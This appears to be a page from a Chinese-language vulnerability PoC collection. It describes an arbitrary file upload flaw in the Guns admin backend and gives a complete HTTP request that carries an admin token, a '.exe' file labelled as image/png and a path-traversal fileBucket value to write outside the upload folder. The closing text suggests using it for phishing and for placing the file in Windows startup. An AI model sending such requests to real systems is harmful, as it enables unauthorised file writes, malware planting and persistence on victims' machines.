Skip to content

Latest commit

 

History

History
48 lines (35 loc) · 2 KB

Guns后台任意文件上传漏洞.md

File metadata and controls

48 lines (35 loc) · 2 KB

Guns后台任意文件上传漏洞

Guns后台任意文件上传漏洞

poc

POST /api/sysFileInfo/upload HTTP/1.1
Host: 192.168.91.130:9000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.91.1:9000/system/structure/user
Authorization: eyJhbGciOiJIUzUxMiJ9.eyJ1c2VySWQiOjEzMzk1NTA0Njc5Mzk2MzkyOTksImFjY291bnQiOiJhZG1pbiIsInV1aWQiOiI1NmQzZjczNy1hNjU1LTRjYzgtODRkNi0xNDdjYTE1M2Y5OGIiLCJyZW1lbWJlck1lIjpmYWxzZSwiZXhwaXJhdGlvbkRhdGUiOjE3MzUxMDM0MDM0ODgsImNhVG9rZW4iOm51bGwsIm90aGVycyI6bnVsbCwic3ViIjoiMTMzOTU1MDQ2NzkzOTYzOTI5OSIsImlhdCI6MTczNDQ5ODYwMywiZXhwIjoxNzM1MTAzNDAzfQ.Ur3bUwltSXWUtIT1OOR4MV4frJeRy_MDEkmYg99F5L2DOx6C4ha_y476dTWMy7gAJZsq5x_2C_VEkWxWv7uHXw
Content-Type: multipart/form-data; boundary=---------------------------4047569836919132683218702
Content-Length: 510
Origin: http://192.168.91.130:9000
Connection: close

-----------------------------4047569836919132683218702
Content-Disposition: form-data; name="file"; filename=".exe"
Content-Type: image/png

1111
-----------------------------4047569836919132683218702
Content-Disposition: form-data; name="secretFlag"

N
-----------------------------4047569836919132683218702
Content-Disposition: form-data; name="fileBucket"

../../../../../../../../../../../../../../../../../../看到请点击exe备份
-----------------------------4047569836919132683218702--

img

img

可以用在钓鱼,如果项目在c盘,可以放到启动项中, 这里可以看到是在哪个盘

img

漏洞来源